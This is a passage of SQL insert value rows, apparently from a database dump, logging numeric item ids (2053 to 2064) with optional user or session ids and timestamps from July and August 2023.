(5564, NULL, NULL, 2055, 1, '2023-07-14 07:37:30'),
(5565, NULL, NULL, 2058, 1, '2023-07-14 07:37:31'),
(5566, NULL, NULL, 2064, 1, '2023-07-14 07:37:32'),
(5567, NULL, NULL, 2063, 1, '2023-07-14 07:37:33'),
(5568, NULL, NULL, 2061, 1, '2023-07-14 07:37:35'),
(5569, NULL, NULL, 2054, 1, '2023-07-14 07:37:42'),
(5570, NULL, NULL, 2059, 1, '2023-07-14 07:37:42'),
(5571, NULL, NULL, 2062, 1, '2023-07-14 07:37:44'),
(5572, NULL, NULL, 2063, 1, '2023-07-14 12:02:19'),
(5573, NULL, NULL, 2053, 1, '2023-07-14 12:02:53'),
(5574, NULL, NULL, 2062, 1, '2023-07-14 12:53:46'),
(5575, NULL, NULL, 2054, 1, '2023-07-14 19:27:48'),
(5576, NULL, NULL, 2059, 1, '2023-07-14 19:29:24'),
(5577, NULL, NULL, 2063, 1, '2023-07-15 03:06:52'),
(5578, NULL, NULL, 2064, 1, '2023-07-15 04:53:40'),
(5579, NULL, NULL, 2054, 1, '2023-07-15 16:05:42'),
(5580, NULL, NULL, 2064, 1, '2023-07-15 16:05:43'),
(5581, NULL, NULL, 2064, 1, '2023-07-15 17:56:43'),
(5582, NULL, NULL, 2053, 1, '2023-07-16 02:01:31'),
(5583, NULL, NULL, 2062, 1, '2023-07-16 03:38:58'),
(5584, NULL, NULL, 2059, 1, '2023-07-16 10:01:41'),
(5585, NULL, NULL, 2060, 1, '2023-07-16 10:16:07'),
(5586, NULL, NULL, 2054, 1, '2023-07-16 10:18:13'),
(5587, NULL, NULL, 2054, 1, '2023-07-17 02:49:46'),
(5588, NULL, NULL, 2055, 1, '2023-07-17 02:49:56'),
(5589, NULL, NULL, 2064, 1, '2023-07-17 02:50:12'),
(5590, NULL, NULL, 2063, 1, '2023-07-17 02:50:24'),
(5591, NULL, NULL, 2062, 1, '2023-07-17 02:50:30'),
(5592, NULL, NULL, 2060, 1, '2023-07-17 02:50:37'),
(5593, NULL, NULL, 2059, 1, '2023-07-17 02:50:43'),
(5594, NULL, NULL, 2061, 1, '2023-07-17 02:50:49'),
(5595, NULL, NULL, 2058, 1, '2023-07-17 02:50:58'),
(5596, NULL, NULL, 2054, 1, '2023-07-17 05:34:46'),
(5597, NULL, NULL, 2062, 1, '2023-07-17 12:29:24'),
(5598, NULL, NULL, 2063, 1, '2023-07-17 16:48:54'),
(5599, NULL, NULL, 2060, 1, '2023-07-17 21:40:15'),
(5600, NULL, NULL, 2061, 1, '2023-07-18 09:42:34'),
(5601, NULL, NULL, 2063, 1, '2023-07-18 09:44:29'),
(5602, NULL, NULL, 2058, 1, '2023-07-18 09:44:41'),
(5603, NULL, NULL, 2062, 1, '2023-07-18 09:47:59'),
(5604, NULL, NULL, 2059, 1, '2023-07-18 09:58:16'),
(5605, NULL, NULL, 2055, 1, '2023-07-18 10:06:41'),
(5606, NULL, NULL, 2063, 1, '2023-07-18 10:24:23'),
(5607, NULL, NULL, 2059, 1, '2023-07-18 10:31:17'),
(5608, NULL, NULL, 2061, 1, '2023-07-18 10:34:19'),
(5609, NULL, NULL, 2054, 1, '2023-07-18 10:35:36'),
(5610, NULL, NULL, 2054, 1, '2023-07-18 10:42:44'),
(5611, NULL, NULL, 2064, 1, '2023-07-18 10:46:59'),
(5612, NULL, NULL, 2060, 1, '2023-07-18 10:59:49'),
(5613, NULL, NULL, 2055, 1, '2023-07-18 11:10:08'),
(5614, NULL, NULL, 2064, 1, '2023-07-18 11:22:50'),
(5615, NULL, NULL, 2062, 1, '2023-07-18 11:26:56'),
(5616, NULL, NULL, 2055, 1, '2023-07-18 12:01:54'),
(5617, NULL, NULL, 2061, 1, '2023-07-18 12:08:27'),
(5618, NULL, NULL, 2062, 1, '2023-07-18 13:10:18'),
(5619, NULL, NULL, 2062, 1, '2023-07-18 14:01:34'),
(5620, NULL, NULL, 2062, 1, '2023-07-18 15:40:07'),
(5621, NULL, NULL, 2058, 1, '2023-07-18 17:19:09'),
(5622, NULL, NULL, 2058, 1, '2023-07-18 20:12:17'),
(5623, NULL, NULL, 2062, 1, '2023-07-18 21:09:34'),
(5624, NULL, NULL, 2062, 1, '2023-07-18 21:09:39'),
(5625, NULL, NULL, 2063, 1, '2023-07-18 22:28:11'),
(5626, NULL, NULL, 2061, 1, '2023-07-18 22:44:46'),
(5627, NULL, NULL, 2063, 1, '2023-07-19 02:42:42'),
(5628, NULL, NULL, 2064, 1, '2023-07-19 10:01:37'),
(5629, NULL, NULL, 2055, 1, '2023-07-19 12:26:22'),
(5630, NULL, NULL, 2062, 1, '2023-07-19 16:39:12'),
(5631, NULL, NULL, 2059, 1, '2023-07-20 02:53:09'),
(5632, NULL, NULL, 2062, 1, '2023-07-20 03:54:59'),
(5633, NULL, NULL, 2063, 1, '2023-07-20 06:03:28'),
(5634, NULL, NULL, 2060, 1, '2023-07-20 08:04:11'),
(5635, NULL, NULL, 2063, 1, '2023-07-20 09:18:05'),
(5636, NULL, NULL, 2062, 1, '2023-07-20 12:42:27'),
(5637, NULL, NULL, 2064, 1, '2023-07-20 13:46:44'),
(5638, NULL, NULL, 2060, 1, '2023-07-21 04:19:34'),
(5639, NULL, NULL, 2054, 1, '2023-07-21 10:45:50'),
(5640, NULL, NULL, 2060, 1, '2023-07-21 11:28:09'),
(5641, NULL, NULL, 2061, 1, '2023-07-21 12:14:36'),
(5642, NULL, NULL, 2059, 1, '2023-07-21 13:31:09'),
(5643, NULL, NULL, 2064, 1, '2023-07-21 14:31:17'),
(5644, NULL, NULL, 2063, 1, '2023-07-21 14:52:00'),
(5645, NULL, NULL, 2058, 1, '2023-07-21 14:52:02'),
(5646, NULL, NULL, 2062, 1, '2023-07-21 15:26:11'),
(5647, NULL, NULL, 2054, 1, '2023-07-21 16:45:49'),
(5648, NULL, NULL, 2060, 1, '2023-07-21 17:26:18'),
(5649, NULL, NULL, 2061, 1, '2023-07-21 18:10:45'),
(5650, NULL, NULL, 2059, 1, '2023-07-21 19:24:18'),
(5651, NULL, NULL, 2064, 1, '2023-07-21 20:21:51'),
(5652, NULL, NULL, 2062, 1, '2023-07-21 21:15:13'),
(5653, NULL, NULL, 2055, 1, '2023-07-21 22:36:53'),
(5654, NULL, NULL, 2062, 1, '2023-07-21 23:21:40'),
(5655, NULL, NULL, 2063, 1, '2023-07-21 23:40:08'),
(5656, NULL, NULL, 2058, 1, '2023-07-21 23:57:46'),
(5657, NULL, NULL, 2054, 1, '2023-07-22 02:18:00'),
(5658, NULL, NULL, 2060, 1, '2023-07-22 03:27:44'),
(5659, NULL, NULL, 2059, 1, '2023-07-22 04:41:34'),
(5660, NULL, NULL, 2061, 1, '2023-07-22 04:42:37'),
(5661, NULL, NULL, 2059, 1, '2023-07-22 06:38:13'),
(5662, NULL, NULL, 2064, 1, '2023-07-22 08:08:40'),
(5663, NULL, NULL, 2062, 1, '2023-07-22 09:28:40'),
(5664, NULL, NULL, 2055, 1, '2023-07-22 11:31:18'),
(5665, NULL, NULL, 2063, 1, '2023-07-22 13:07:39'),
(5666, NULL, NULL, 2058, 1, '2023-07-22 13:34:56'),
(5667, NULL, NULL, 2055, 1, '2023-07-22 19:11:07'),
(5668, NULL, NULL, 2054, 1, '2023-07-23 13:47:48'),
(5669, NULL, NULL, 2062, 1, '2023-07-23 16:31:49'),
(5670, NULL, NULL, 2064, 1, '2023-07-23 19:28:19'),
(5671, NULL, NULL, 2062, 1, '2023-07-24 01:37:06'),
(5672, NULL, NULL, 2061, 1, '2023-07-24 10:03:20'),
(5673, NULL, NULL, 2054, 1, '2023-07-24 11:32:49'),
(5674, NULL, NULL, 2061, 1, '2023-07-24 13:47:28'),
(5675, NULL, NULL, 2062, 1, '2023-07-24 21:29:35'),
(5676, NULL, NULL, 2055, 1, '2023-07-25 01:56:24'),
(5677, NULL, NULL, 2058, 1, '2023-07-25 03:48:32'),
(5678, NULL, NULL, 2064, 1, '2023-07-25 05:54:24'),
(5679, NULL, NULL, 2062, 1, '2023-07-25 08:00:49'),
(5680, NULL, NULL, 2059, 1, '2023-07-25 15:20:59'),
(5681, NULL, NULL, 2064, 1, '2023-07-25 15:41:26'),
(5682, NULL, NULL, 2061, 1, '2023-07-25 16:51:09'),
(5683, NULL, NULL, 2054, 1, '2023-07-25 16:51:11'),
(5684, NULL, NULL, 2059, 1, '2023-07-25 16:58:21'),
(5685, NULL, NULL, 2063, 1, '2023-07-26 00:04:07'),
(5686, NULL, NULL, 2062, 1, '2023-07-26 01:49:05'),
(5687, NULL, NULL, 2063, 1, '2023-07-26 08:04:29'),
(5688, NULL, NULL, 2064, 1, '2023-07-26 09:46:33'),
(5689, NULL, NULL, 2054, 1, '2023-07-26 16:24:15'),
(5690, NULL, NULL, 2060, 1, '2023-07-26 17:05:22'),
(5691, NULL, NULL, 2061, 1, '2023-07-26 17:50:41'),
(5692, NULL, NULL, 2059, 1, '2023-07-26 19:06:58'),
(5693, NULL, NULL, 2064, 1, '2023-07-26 20:08:05'),
(5694, NULL, NULL, 2062, 1, '2023-07-26 20:27:19'),
(5695, NULL, NULL, 2060, 1, '2023-07-26 20:44:24'),
(5696, NULL, NULL, 2062, 1, '2023-07-26 21:03:11'),
(5697, NULL, NULL, 2054, 1, '2023-07-26 21:46:32'),
(5698, NULL, NULL, 2060, 1, '2023-07-26 22:25:25'),
(5699, NULL, NULL, 2061, 1, '2023-07-26 23:08:28'),
(5700, NULL, NULL, 2064, 1, '2023-07-26 23:43:22'),
(5701, NULL, NULL, 2059, 1, '2023-07-27 00:22:30'),
(5702, NULL, NULL, 2064, 1, '2023-07-27 01:22:06'),
(5703, NULL, NULL, 2054, 1, '2023-07-27 02:24:33'),
(5704, NULL, NULL, 2060, 1, '2023-07-27 03:05:40'),
(5705, NULL, NULL, 2055, 1, '2023-07-27 03:42:06'),
(5706, NULL, NULL, 2061, 1, '2023-07-27 03:53:23'),
(5707, NULL, NULL, 2059, 1, '2023-07-27 05:28:29'),
(5708, NULL, NULL, 2064, 1, '2023-07-27 06:35:23'),
(5709, NULL, NULL, 2059, 1, '2023-07-27 06:55:06'),
(5710, NULL, NULL, 2062, 1, '2023-07-27 07:42:31'),
(5711, NULL, NULL, 2059, 1, '2023-07-27 08:45:20'),
(5712, NULL, NULL, 2055, 1, '2023-07-27 09:23:10'),
(5713, NULL, NULL, 2063, 1, '2023-07-27 10:36:24'),
(5714, NULL, NULL, 2058, 1, '2023-07-27 10:57:05'),
(5715, NULL, NULL, 2062, 1, '2023-07-27 20:28:30'),
(5716, NULL, NULL, 2054, 1, '2023-07-27 21:56:53'),
(5717, NULL, NULL, 2060, 1, '2023-07-27 22:38:15'),
(5718, NULL, NULL, 2061, 1, '2023-07-27 23:32:02'),
(5719, NULL, NULL, 2059, 1, '2023-07-28 01:00:36'),
(5720, NULL, NULL, 2064, 1, '2023-07-28 02:06:16'),
(5721, NULL, NULL, 2062, 1, '2023-07-28 03:02:32'),
(5722, NULL, NULL, 2059, 1, '2023-07-28 03:29:39'),
(5723, NULL, NULL, 2055, 1, '2023-07-28 04:29:41'),
(5724, NULL, NULL, 2063, 1, '2023-07-28 05:36:16'),
(5725, NULL, NULL, 2058, 1, '2023-07-28 05:54:42'),
(5726, NULL, NULL, 2062, 1, '2023-07-28 07:13:24'),
(5727, NULL, NULL, 2055, 1, '2023-07-28 15:45:59'),
(5728, NULL, NULL, 2054, 1, '2023-07-28 16:09:12'),
(5729, NULL, NULL, 2062, 1, '2023-07-28 16:34:09'),
(5730, NULL, NULL, 2060, 1, '2023-07-28 16:51:03'),
(5731, NULL, NULL, 2061, 1, '2023-07-28 17:36:47'),
(5732, NULL, NULL, 2054, 1, '2023-07-28 18:58:02'),
(5733, NULL, NULL, 2054, 1, '2023-07-28 20:04:20'),
(5734, NULL, NULL, 2053, 1, '2023-07-28 20:21:58'),
(5735, NULL, NULL, 2061, 1, '2023-07-28 20:49:00'),
(5736, NULL, NULL, 2058, 1, '2023-07-28 21:08:41'),
(5737, NULL, NULL, 2054, 1, '2023-07-28 21:12:20'),
(5738, NULL, NULL, 2054, 1, '2023-07-28 21:47:44'),
(5739, NULL, NULL, 2060, 1, '2023-07-28 21:58:05'),
(5740, NULL, NULL, 2054, 1, '2023-07-28 22:37:42'),
(5741, NULL, NULL, 2060, 1, '2023-07-28 23:18:00'),
(5742, NULL, NULL, 2055, 1, '2023-07-29 00:00:23'),
(5743, NULL, NULL, 2061, 1, '2023-07-29 00:02:50'),
(5744, NULL, NULL, 2059, 1, '2023-07-29 01:20:12'),
(5745, NULL, NULL, 2054, 1, '2023-07-29 01:34:56'),
(5746, NULL, NULL, 2055, 1, '2023-07-29 01:34:57'),
(5747, NULL, NULL, 2064, 1, '2023-07-29 01:35:01'),
(5748, NULL, NULL, 2063, 1, '2023-07-29 01:35:02'),
(5749, NULL, NULL, 2062, 1, '2023-07-29 01:35:03'),
(5750, NULL, NULL, 2060, 1, '2023-07-29 01:35:04'),
(5751, NULL, NULL, 2059, 1, '2023-07-29 01:35:06'),
(5752, NULL, NULL, 2061, 1, '2023-07-29 01:35:07'),
(5753, NULL, NULL, 2058, 1, '2023-07-29 01:35:08'),
(5754, NULL, NULL, 2064, 1, '2023-07-29 01:59:09'),
(5755, NULL, NULL, 2064, 1, '2023-07-29 02:22:41'),
(5756, NULL, NULL, 2064, 1, '2023-07-29 02:37:30'),
(5757, NULL, NULL, 2062, 1, '2023-07-29 03:17:40'),
(5758, NULL, NULL, 2054, 1, '2023-07-29 04:12:33'),
(5759, NULL, NULL, 2059, 1, '2023-07-29 04:14:15'),
(5760, NULL, NULL, 2055, 1, '2023-07-29 04:43:24'),
(5761, NULL, NULL, 2063, 1, '2023-07-29 05:48:44'),
(5762, NULL, NULL, 2063, 1, '2023-07-29 05:51:30'),
(5763, NULL, NULL, 2058, 1, '2023-07-29 06:07:04'),
(5764, NULL, NULL, 2061, 1, '2023-07-29 07:41:18'),
(5765, NULL, NULL, 2054, 1, '2023-07-29 07:41:25'),
(5766, NULL, NULL, 2060, 1, '2023-07-29 09:38:43'),
(5767, NULL, NULL, 2062, 1, '2023-07-29 12:28:25'),
(5768, NULL, NULL, 2063, 1, '2023-07-29 18:12:15'),
(5769, NULL, NULL, 2061, 1, '2023-07-29 19:26:00'),
(5770, NULL, NULL, 2055, 1, '2023-07-29 20:10:27'),
(5771, NULL, NULL, 2058, 1, '2023-07-30 08:31:59'),
(5772, NULL, NULL, 2054, 1, '2023-07-30 10:51:48'),
(5773, NULL, NULL, 2062, 1, '2023-07-30 12:00:06'),
(5774, NULL, NULL, 2063, 1, '2023-07-30 12:45:02'),
(5775, NULL, NULL, 2058, 1, '2023-07-30 14:46:02'),
(5776, NULL, NULL, 2061, 1, '2023-07-30 17:12:58'),
(5777, NULL, NULL, 2064, 1, '2023-07-30 17:59:06'),
(5778, NULL, NULL, 2064, 1, '2023-07-31 05:33:23'),
(5779, NULL, NULL, 2064, 1, '2023-07-31 06:59:20'),
(5780, NULL, NULL, 2063, 1, '2023-07-31 09:17:40'),
(5781, NULL, NULL, 2054, 1, '2023-07-31 09:40:42'),
(5782, NULL, NULL, 2063, 1, '2023-07-31 11:12:17'),
(5783, NULL, NULL, 2063, 1, '2023-07-31 11:12:18'),
(5784, NULL, NULL, 2064, 1, '2023-07-31 16:51:18'),
(5785, NULL, NULL, 2061, 1, '2023-07-31 18:40:01'),
(5786, NULL, NULL, 2064, 1, '2023-07-31 19:31:32'),
(5787, NULL, NULL, 2062, 1, '2023-07-31 19:48:57'),
(5788, NULL, NULL, 2054, 1, '2023-07-31 22:14:54'),
(5789, NULL, NULL, 2053, 1, '2023-07-31 22:14:54'),
(5790, NULL, NULL, 2055, 1, '2023-07-31 22:14:59'),
(5791, NULL, NULL, 2064, 1, '2023-07-31 22:15:53'),
(5792, NULL, NULL, 2063, 1, '2023-07-31 22:16:09'),
(5793, NULL, NULL, 2062, 1, '2023-07-31 22:16:21'),
(5794, NULL, NULL, 2060, 1, '2023-07-31 22:16:27'),
(5795, NULL, NULL, 2059, 1, '2023-07-31 22:16:38'),
(5796, NULL, NULL, 2061, 1, '2023-07-31 22:16:44'),
(5797, NULL, NULL, 2058, 1, '2023-07-31 22:16:51'),
(5798, NULL, NULL, 2058, 1, '2023-07-31 23:31:07'),
(5799, NULL, NULL, 2054, 1, '2023-08-01 09:18:06'),
(5800, NULL, NULL, 2054, 1, '2023-08-01 18:14:27'),
(5801, NULL, NULL, 2060, 1, '2023-08-01 18:55:54'),
(5802, NULL, NULL, 2061, 1, '2023-08-01 19:41:35'),
(5803, NULL, NULL, 2059, 1, '2023-08-01 20:59:39'),
(5804, NULL, NULL, 2060, 1, '2023-08-01 21:38:44'),
(5805, NULL, NULL, 2054, 1, '2023-08-01 21:51:58'),
(5806, NULL, NULL, 2060, 1, '2023-08-01 22:32:04'),
(5807, NULL, NULL, 2061, 1, '2023-08-01 23:16:16'),
(5808, NULL, NULL, 2059, 1, '2023-08-02 00:32:19'),
(5809, NULL, NULL, 2058, 1, '2023-08-02 00:55:29'),
(5810, NULL, NULL, 2064, 1, '2023-08-02 01:33:42'),
(5811, NULL, NULL, 2062, 1, '2023-08-02 02:31:49'),
(5812, NULL, NULL, 2055, 1, '2023-08-02 03:53:41'),
(5813, NULL, NULL, 2063, 1, '2023-08-02 04:56:03'),
(5814, NULL, NULL, 2059, 1, '2023-08-02 05:13:22'),
(5815, NULL, NULL, 2058, 1, '2023-08-02 05:13:59'),
(5816, NULL, NULL, 2055, 1, '2023-08-02 06:28:46'),
(5817, NULL, NULL, 2058, 1, '2023-08-02 15:59:26'),
(5818, NULL, NULL, 2063, 1, '2023-08-02 20:52:11'),
(5819, NULL, NULL, 2063, 1, '2023-08-02 20:52:18'),
(5820, NULL, NULL, 2059, 1, '2023-08-03 00:49:16'),
(5821, NULL, NULL, 2055, 1, '2023-08-03 05:19:39'),
(5822, NULL, NULL, 2061, 1, '2023-08-03 06:49:43'),
(5823, NULL, NULL, 2061, 1, '2023-08-03 08:19:43'),
(5824, NULL, NULL, 2060, 1, '2023-08-03 08:47:46'),
(5825, NULL, NULL, 2060, 1, '2023-08-03 08:55:16'),
(5826, NULL, NULL, 2062, 1, '2023-08-03 10:53:28'),
(5827, NULL, NULL, 2054, 1, '2023-08-03 14:41:40'),
(5828, NULL, NULL, 2055, 1, '2023-08-03 14:41:45'),
(5829, NULL, NULL, 2063, 1, '2023-08-03 17:45:42'),
(5830, NULL, NULL, 2054, 1, '2023-08-04 00:30:08'),
(5831, NULL, NULL, 2063, 1, '2023-08-04 05:03:29'),
(5832, NULL, NULL, 2063, 1, '2023-08-04 05:03:52'),
(5833, NULL, NULL, 2059, 1, '2023-08-04 07:32:11'),
(5834, NULL, NULL, 2058, 1, '2023-08-04 16:00:16'),
(5835, NULL, NULL, 2064, 1, '2023-08-04 20:14:33'),
(5836, NULL, NULL, 2061, 1, '2023-08-05 00:46:13'),
(5837, NULL, NULL, 2061, 1, '2023-08-05 00:47:27'),
(5838, NULL, NULL, 2064, 1, '2023-08-05 03:55:25'),
(5839, NULL, NULL, 2062, 1, '2023-08-05 06:47:12'),
(5840, NULL, NULL, 2064, 1, '2023-08-05 16:11:55'),
(5841, NULL, NULL, 2061, 1, '2023-08-05 16:41:54'),
(5842, NULL, NULL, 2064, 1, '2023-08-05 17:43:35'),
(5843, NULL, NULL, 2055, 1, '2023-08-05 18:27:28'),
(5844, NULL, NULL, 2063, 1, '2023-08-05 18:49:25'),
(5845, NULL, NULL, 2061, 1, '2023-08-05 20:22:47'),
(5846, NULL, NULL, 2055, 1, '2023-08-05 21:54:09'),
(5847, NULL, NULL, 2062, 1, '2023-08-05 22:13:00'),
(5848, NULL, NULL, 2064, 1, '2023-08-05 23:55:54'),
(5849, NULL, NULL, 2054, 1, '2023-08-06 00:29:17'),
(5850, NULL, NULL, 2063, 1, '2023-08-06 02:22:08'),
(5851, NULL, NULL, 2059, 1, '2023-08-06 03:41:54'),
(5852, NULL, NULL, 2059, 1, '2023-08-06 21:30:14'),
(5853, NULL, NULL, 2055, 1, '2023-08-06 21:55:00'),
(5854, NULL, NULL, 2058, 1, '2023-08-07 01:14:51'),
(5855, NULL, NULL, 2063, 1, '2023-08-07 01:53:38'),
(5856, NULL, NULL, 2059, 1, '2023-08-07 04:45:43'),
(5857, NULL, NULL, 2059, 1, '2023-08-07 04:55:36'),
(5858, NULL, NULL, 2060, 1, '2023-08-07 04:57:09'),
(5859, NULL, NULL, 2058, 1, '2023-08-07 04:57:15'),
(5860, NULL, NULL, 2062, 1, '2023-08-07 04:57:16'),
(5861, NULL, NULL, 2064, 1, '2023-08-07 04:57:19'),
(5862, NULL, NULL, 2059, 1, '2023-08-07 04:57:20'),
(5863, NULL, NULL, 2061, 1, '2023-08-07 04:57:22'),
(5864, NULL, NULL, 2055, 1, '2023-08-07 04:57:23'),
(5865, NULL, NULL, 2054, 1, '2023-08-07 04:57:24'),
(5866, NULL, NULL, 2063, 1, '2023-08-07 04:57:24'),
(5867, NULL, NULL, 2060, 1, '2023-08-07 08:04:56'),
(5868, NULL, NULL, 2060, 1, '2023-08-07 15:49:53'),
(5869, NULL, NULL, 2060, 1, '2023-08-08 00:30:32'),
(5870, NULL, NULL, 2054, 1, '2023-08-08 00:31:27'),
(5871, NULL, NULL, 2060, 1, '2023-08-08 00:32:22'),
(5872, NULL, NULL, 2058, 1, '2023-08-08 00:33:16'),
(5873, NULL, NULL, 2062, 1, '2023-08-08 00:34:12'),
(5874, NULL, NULL, 2060, 1, '2023-08-08 01:56:04'),
(5875, NULL, NULL, 2062, 1, '2023-08-08 07:15:15'),
(5876, NULL, NULL, 2059, 1, '2023-08-08 09:54:03'),
(5877, NULL, NULL, 2054, 1, '2023-08-08 10:25:39'),
(5878, NULL, NULL, 2059, 1, '2023-08-08 12:33:20'),
(5879, NULL, NULL, 2059, 1, '2023-08-08 15:14:41'),
(5880, NULL, NULL, 2055, 1, '2023-08-08 17:28:15'),
(5881, NULL, NULL, 2059, 1, '2023-08-08 20:24:40'),
(5882, NULL, NULL, 2053, 1, '2023-08-08 20:55:31'),
(5883, NULL, NULL, 2058, 1, '2023-08-08 20:55:41'),
(5884, NULL, NULL, 2054, 1, '2023-08-08 20:57:16'),
(5885, NULL, NULL, 2060, 1, '2023-08-08 21:00:05'),
(5886, NULL, NULL, 2063, 1, '2023-08-08 21:03:15'),
(5887, NULL, NULL, 2055, 1, '2023-08-08 21:06:36'),
(5888, NULL, NULL, 2063, 1, '2023-08-08 21:13:19'),
(5889, NULL, NULL, 2060, 1, '2023-08-08 21:13:47'),
(5890, NULL, NULL, 2053, 1, '2023-08-09 00:40:01'),
(5891, NULL, NULL, 2058, 1, '2023-08-09 00:40:10'),
(5892, NULL, NULL, 2054, 1, '2023-08-09 00:41:45'),
(5893, NULL, NULL, 2054, 1, '2023-08-09 03:05:09'),
(5894, NULL, NULL, 2055, 1, '2023-08-09 03:05:14'),
(5895, NULL, NULL, 2058, 1, '2023-08-09 05:19:56'),
(5896, NULL, NULL, 2062, 1, '2023-08-09 08:04:12'),
(5897, NULL, NULL, 2064, 1, '2023-08-09 14:19:50'),
(5898, NULL, NULL, 2061, 1, '2023-08-09 19:57:13'),
(5899, NULL, NULL, 2059, 1, '2023-08-09 19:57:15'),
(5900, NULL, NULL, 2054, 1, '2023-08-10 00:17:15'),
(5901, NULL, NULL, 2055, 1, '2023-08-10 00:17:15'),
(5902, NULL, NULL, 2059, 1, '2023-08-10 00:17:15'),
(5903, NULL, NULL, 2062, 1, '2023-08-10 00:17:15'),
(5904, NULL, NULL, 2058, 1, '2023-08-10 00:17:15'),
(5905, NULL, NULL, 2064, 1, '2023-08-10 00:17:15'),
(5906, NULL, NULL, 2063, 1, '2023-08-10 00:17:15'),
(5907, NULL, NULL, 2061, 1, '2023-08-10 00:17:15'),
(5908, NULL, NULL, 2060, 1, '2023-08-10 00:17:15'),
(5909, NULL, NULL, 2054, 1, '2023-08-10 00:52:24'),
(5910, NULL, NULL, 2064, 1, '2023-08-10 01:11:53'),
(5911, NULL, NULL, 2064, 1, '2023-08-10 02:32:36'),
(5912, NULL, NULL, 2053, 1, '2023-08-10 03:36:55'),
(5913, NULL, NULL, 2063, 1, '2023-08-10 03:37:12'),
(5914, NULL, NULL, 2062, 1, '2023-08-10 03:37:14'),
(5915, NULL, NULL, 2060, 1, '2023-08-10 03:37:17'),
(5916, NULL, NULL, 2059, 1, '2023-08-10 03:37:20'),
(5917, NULL, NULL, 2061, 1, '2023-08-10 03:53:10'),
(5918, NULL, NULL, 2063, 1, '2023-08-10 07:13:38'),
(5919, NULL, NULL, 2055, 1, '2023-08-10 08:30:03'),
(5920, NULL, NULL, 2064, 1, '2023-08-10 10:41:27'),
(5921, NULL, NULL, 2054, 1, '2023-08-10 13:21:03'),
(5922, NULL, NULL, 2058, 1, '2023-08-10 15:29:31'),
(5923, NULL, NULL, 2064, 1, '2023-08-10 16:38:07'),
(5924, NULL, NULL, 2062, 1, '2023-08-10 16:38:15'),
(5925, NULL, NULL, 2059, 1, '2023-08-10 17:41:51'),
(5926, NULL, NULL, 2062, 1, '2023-08-10 18:26:51'),
(5927, NULL, NULL, 2061, 1, '2023-08-10 20:11:51'),
(5928, NULL, NULL, 2058, 1, '2023-08-11 04:32:38'),
(5929, NULL, NULL, 2059, 1, '2023-08-11 06:19:25'),
(5930, NULL, NULL, 2055, 1, '2023-08-11 07:06:52'),
(5931, NULL, NULL, 2060, 1, '2023-08-11 07:07:48'),
(5932, NULL, NULL, 2054, 1, '2023-08-11 07:08:42'),
(5933, NULL, NULL, 2060, 1, '2023-08-11 07:09:38'),
(5934, NULL, NULL, 2063, 1, '2023-08-11 07:10:05'),
(5935, NULL, NULL, 2058, 1, '2023-08-11 07:10:57'),
(5936, NULL, NULL, 2062, 1, '2023-08-11 07:11:05'),
(5937, NULL, NULL, 2064, 1, '2023-08-11 10:53:30'),
(5938, NULL, NULL, 2058, 1, '2023-08-11 11:58:50'),
(5939, NULL, NULL, 2054, 1, '2023-08-11 11:58:59'),
(5940, NULL, NULL, 2064, 1, '2023-08-11 11:59:01'),
(5941, NULL, NULL, 2062, 1, '2023-08-11 11:59:10'),
(5942, NULL, NULL, 2060, 1, '2023-08-11 11:59:11'),
(5943, NULL, NULL, 2055, 1, '2023-08-11 11:59:15'),
(5944, NULL, NULL, 2059, 1, '2023-08-11 11:59:20'),
(5945, NULL, NULL, 2063, 1, '2023-08-11 11:59:22'),
(5946, NULL, NULL, 2061, 1, '2023-08-11 11:59:23'),
(5947, NULL, NULL, 2058, 1, '2023-08-11 11:59:43'),
(5948, NULL, NULL, 2054, 1, '2023-08-11 11:59:52'),
(5949, NULL, NULL, 2064, 1, '2023-08-11 11:59:54'),
(5950, NULL, NULL, 2062, 1, '2023-08-11 12:00:00'),
(5951, NULL, NULL, 2055, 1, '2023-08-11 12:00:02'),
(5952, NULL, NULL, 2059, 1, '2023-08-11 12:00:07'),
(5953, NULL, NULL, 2063, 1, '2023-08-11 12:00:09'),
(5954, NULL, NULL, 2061, 1, '2023-08-11 12:00:10'),
(5955, NULL, NULL, 2060, 1, '2023-08-11 12:00:15'),
(5956, NULL, NULL, 2053, 1, '2023-08-11 12:00:30'),
(5957, NULL, NULL, 2054, 1, '2023-08-11 14:51:32'),
(5958, NULL, NULL, 2063, 1, '2023-08-11 15:54:15'),
(5959, NULL, NULL, 2060, 1, '2023-08-11 17:49:26'),
(5960, NULL, NULL, 2058, 1, '2023-08-12 03:49:52'),
(5961, 1032, NULL, 2053, 1, '2023-08-12 08:40:43'),
(5962, 1032, NULL, 2054, 1, '2023-08-12 08:40:48'),
(5963, 1032, NULL, 2055, 1, '2023-08-12 08:40:53'),
(5964, 1032, NULL, 2058, 1, '2023-08-12 08:40:57'),
(5965, 1032, NULL, 2059, 1, '2023-08-12 08:41:03'),
(5966, 1032, NULL, 2060, 1, '2023-08-12 08:41:07'),
(5967, 1032, NULL, 2061, 1, '2023-08-12 08:41:11'),
(5968, 1032, NULL, 2062, 1, '2023-08-12 08:41:16'),
(5969, 1032, NULL, 2063, 1, '2023-08-12 08:41:21'),
(5970, 1032, NULL, 2064, 1, '2023-08-12 08:41:25'),
(5971, NULL, 75, 2054, 1, '2023-08-12 09:01:07'),
(5972, NULL, 75, 2060, 1, '2023-08-12 09:04:55'),
(5977, NULL, NULL, 2058, 1, '2023-08-12 09:31:46'),
(5978, 1033, NULL, 2060, 1, '2023-08-12 12:22:30'),
(5979, 1033, NULL, 2055, 1, '2023-08-12 12:36:59'),
(5982, 1033, NULL, 2053, 1, '2023-08-12 12:41:34'),
(5983, 1033, NULL, 2064, 1, '2023-08-12 12:45:30'),
(5985, 1033, NULL, 2063, 1, '2023-08-12 12:48:12'),
(5986, 1033, NULL, 2062, 1, '2023-08-12 12:49:03'),
(5990, 1033, NULL, 2059, 1, '2023-08-12 12:51:06'),
(5991, 1033, NULL, 2061, 1, '2023-08-12 12:52:06'),
(5993, 1033, NULL, 2058, 1, '2023-08-12 12:52:21'),
(6006, NULL, NULL, 2055, 1, '2023-08-12 23:11:04'),
(6007, NULL, NULL, 2059, 1, '2023-08-13 10:48:23'),
(6008, NULL, NULL, 2060, 1, '2023-08-14 11:29:13'),
(6009, NULL, NULL, 2061, 1, '2023-08-14 12:02:44'),
(6010, NULL, NULL, 2062, 1, '2023-08-14 12:02:45'),
(6011, NULL, NULL, 2064, 1, '2023-08-14 12:02:46'),
(6012, NULL, NULL, 2063, 1, '2023-08-14 12:02:48'),
(6013, NULL, NULL, 2053, 1, '2023-08-14 12:02:52'),
(6014, NULL, NULL, 2061, 1, '2023-08-14 13:10:50'),
